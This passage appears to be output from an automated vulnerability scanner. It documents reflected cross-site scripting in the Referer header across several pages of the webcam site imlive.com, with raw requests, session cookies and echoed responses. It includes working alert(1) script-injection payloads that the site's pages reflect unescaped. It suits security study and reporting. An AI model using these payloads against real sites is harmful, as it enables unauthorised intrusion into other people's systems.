GET /preparesearch.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=198f8'-alert(1)-'996d2f33bb5
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18795'-alert(1)-'f742b451262 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /preparesearch.aspx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=18795'-alert(1)-'f742b451262
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:02 GMT Connection: close Content-Length: 18928 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/preparesearch.aspx&he=imlive.com&ul=/preparesearch.aspx&rf=http://www.google.com/search?hl=en^q=18795'-alert(1)-'f742b451262&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9024'-alert(1)-'8f7cf0979cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=b9024'-alert(1)-'8f7cf0979cd
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e210'><script>alert(1)</script>f3991d075f5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /sitemap.html HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=4e210'><script>alert(1)</script>f3991d075f5
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:10 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2FSf8bs6wRlvXx1sFag%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:11 GMT Connection: close Content-Length: 33816 Vary: Accept-Encoding
<html> <head> <meta name="keywords" content="live Video Chat, Video Chat live, Video Chat live, live Video Chat, webcam chat, live web cam, webcam live, live webcam, web cam live, web cam communti ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/sitemap.html&lr=1107816008&ud=0&pe=sitemap.asp&rf=http://www.google.com/search?hl=en^q=4e210'><script>alert(1)</script>f3991d075f5&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 111ed'><script>alert(1)</script>4d6efbd9952 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /videosfr.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=111ed'><script>alert(1)</script>4d6efbd9952
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:13:48 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/ X-Powered-By: vsrv49 Date: Fri, 28 Jan 2011 14:13:47 GMT Connection: close Content-Length: 15789 Vary: Accept-Encoding
<html> <head> <title>Video Chat Recorded on Webcam at ImLive</title> <meta name="description" content="Come in and discover what our hosts have recorded in Friends & Romance live webcam vide ...[SNIP]... <img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/videosfr.asp&lr=1107816009&ud=0&pe=videosfr.asp&rf=http://www.google.com/search?hl=en^q=111ed'><script>alert(1)</script>4d6efbd9952&sr=10098785&iy=dallas&id=44&iu=1&ld=701' height='1' width='1'> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ff88f'><script>alert(1)</script>7d0fb5f5c2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /warningms.asp HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=ff88f'><script>alert(1)</script>7d0fb5f5c2
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:25:18 GMT Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/ Set-Cookie: ix=k; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:25:18 GMT Connection: close Content-Length: 14501 Vary: Accept-Encoding
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad308'-alert(1)-'2250bef2d23 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-advanced-search/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=ad308'-alert(1)-'2250bef2d23
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:58 GMT Connection: close Content-Length: 74454 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... "text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/advancedsearch.aspx&he=imlive.com&ul=/webcam-advanced-search/&rf=http://www.google.com/search?hl=en^q=ad308'-alert(1)-'2250bef2d23&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fad7'-alert(1)-'8afcbd3f2d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-faq/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=2fad7'-alert(1)-'8afcbd3f2d9
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e5a5'-alert(1)-'88572b36594 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f7f4'-alert(1)-'eebadb10194 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /webcam-sign-up/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=4f7f4'-alert(1)-'eebadb10194
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9d2b'-alert(1)-'d37559930d9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wmaster.ashx HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; Referer: http://www.google.com/search?hl=en&q=f9d2b'-alert(1)-'d37559930d9
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a1e0b'><script>alert(1)</script>829092c5393 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /wmaster.ashx?WID=124669500825&LinkID=701&gotopage=homepagems3.asp&waron=yes&promocode=YZSUSA5583 HTTP/1.1 Host: imlive.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Referer: http://www.google.com/search?hl=en&q=a1e0b'><script>alert(1)</script>829092c5393
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbbcb'-alert(1)-'3f0965cdc19 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
